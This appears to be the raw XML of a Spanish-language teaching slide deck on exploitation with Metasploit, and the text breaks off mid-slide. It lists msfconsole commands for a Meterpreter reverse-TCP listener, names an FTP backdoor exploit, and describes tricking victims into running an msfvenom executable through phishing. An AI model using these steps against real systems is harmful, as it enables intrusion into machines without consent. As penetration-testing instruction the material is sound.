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7" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="87" d="100"/>
          <a:sy n="87" d="100"/>
        </p:scale>
        <p:origin x="72"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9/21/2025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‹Nº›</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8" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="609600"/>
            <a:ext cx="10131425" cy="1456267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES"/>
              <a:t>Haga clic para modificar el estilo de título del patrón</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9/21/2025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9/21/2025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F3B2E7-B715-241C-F73B-0114C35CECBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2048608" y="1964267"/>
            <a:ext cx="9111517" cy="2421464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>Explotación </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-CL" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>el arte de usar tus habilidades</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4294559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FD597F-1756-DCC3-F78C-E630340EDE73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="609601"/>
            <a:ext cx="10131425" cy="647700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0"/>
              <a:t>Con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B93E5E5B-1AAC-BB5C-458A-6B6CF28FE072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>Comandos en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>set LHOST 192.168.1.10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> run o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Título 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB03A0B1-D2E6-051A-BB26-A25D77928BB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="1184032"/>
            <a:ext cx="10131425" cy="647700"/>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s-CL" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="CuadroTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4A9D07-F6A6-1361-E8E4-6F00FB76FBC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437917" y="328136"/>
            <a:ext cx="6097464" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>Configurar el Oyente (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>): El atacante abre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> y configura el multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t> para escuchar la conexión entrante. Es esencial que los parámetros </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>, LHOST y LPORT coincidan exactamente con los que se usaron en el comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE22847D-478F-84AA-DF95-C8E332C86EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4437917" y="4457590"/>
            <a:ext cx="6097464" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>Ejecutar el Archivo en la Máquina Víctima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: El atacante debe ingeniárselas para que el usuario de la máquina víctima ejecute el archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. Esto puede ser a través de ingeniería social, un ataque de phishing, o aprovechando alguna vulnerabilidad para subir y ejecutar el archivo.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46355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912A20-0D1F-429A-B543-4D2F2B58B4BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="178777"/>
            <a:ext cx="9873761" cy="568570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1800" b="1" dirty="0">
                <a:latin typeface="Amasis MT Pro Black" panose="020F0502020204030204" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Explicación del Flujo de Ataque 🧠</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" sz="1800" b="1" dirty="0">
              <a:latin typeface="Amasis MT Pro Black" panose="020F0502020204030204" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B34E3E45-0988-D633-D88C-9D7D84842EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858715" y="923192"/>
            <a:ext cx="10647484" cy="6011008"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>Encontrar la Vulnerabilidad (Reconocimiento y Escaneo):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> 🔍</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>Primero, identificas una debilidad en la máquina objetivo, ya sea en un sistema operativo, un servicio (como Apache o MySQL) o una aplicación web. La vulnerabilidad es la puerta sin cerrojo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>Ejemplo:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> Usas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> y encuentras un servicio FTP que es vulnerable a un ataque de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> (puerta trasera).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>Lanzar el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t> (Explotación):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> 💥</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>Aquí es donde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> entra en juego. Buscas y seleccionas un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> que corresponda a la vulnerabilidad que encontraste. Este </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> es como la llave maestra que va a abrir esa puerta.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>Ejemplo:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> Usas el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>/ftp/proftpd_133c_backdoor para aprovechar la debilidad en el servicio FTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>Recibir el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t> (Post-Explotación):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> 💻</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>Una vez que el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> abre la puerta, necesita una forma de darte control. Aquí es donde el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> entra en juego. El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> entrega el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>, que es un pequeño programa.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>Hay dos tipos de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> comunes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-MX" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Bind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1400" b="1" dirty="0"/>
              <a:t> Shell:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1400" dirty="0"/>
              <a:t> Abre un puerto en la máquina de la víctima y espera que te conectes. Es útil si el firewall de la víctima no es estricto con las conexiones entrantes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-MX" sz="1400" b="1" dirty="0"/>
              <a:t>Reverse Shell:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1400" dirty="0"/>
              <a:t> La máquina de la víctima se conecta a tu máquina. Es más común porque los firewalls suelen permitir las conexiones salientes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>multihandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t> es el módulo que tú configuras en tu máquina para escuchar la conexión de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0"/>
              <a:t>reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="1600" dirty="0"/>
              <a:t>. Es tu "puerto de escucha", esperando a que la víctima se conecte para darte una sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-MX" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2433108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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F6B5E5-E576-68C0-6DCD-3EC6A77DC748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311442" y="-398646"/>
            <a:ext cx="9529011" cy="7623209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224974605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924E06-3EE4-3038-09D4-40440C89E02D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0"/>
              <a:t>¿Dónde entra el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0" err="1"/>
              <a:t>multihandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-CL" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6B3F72-A468-3ED6-3A66-0D603CDB16C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="2142068"/>
            <a:ext cx="11183814" cy="1366064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>multihandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> se usa en un escenario un poco diferente, cuando no lanzas el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> directamente desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. Por ejemplo, si creas un archivo ejecutable malicioso con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> y lo envías por correo electrónico a un usuario. En ese caso, el usuario abrirá el archivo en su máquina, y tú solo necesitas un puerto de escucha para recibir la conexión. Aquí es donde usarías el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>multihandler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8608439F-60F8-7093-DA63-88EB76121457}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2361712" y="3429000"/>
            <a:ext cx="6606442" cy="3374607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="638899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8268E2-1188-F2D7-E40C-0EE35B69557E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> Shell: El </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0" err="1"/>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" b="1" dirty="0"/>
              <a:t> Avanzado</a:t>
            </a:r>
            <a:endParaRPr lang="es-CL" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83A01A8B-BD91-21BA-A993-8EC6082DDFDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> es el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t> más sofisticado de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Ventajas: Es indetectable para muchos sistemas de seguridad y se carga en la memoria, no deja rastros en el disco. Comandos Básicos: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>help</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>: Muestra los comandos disponibles. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
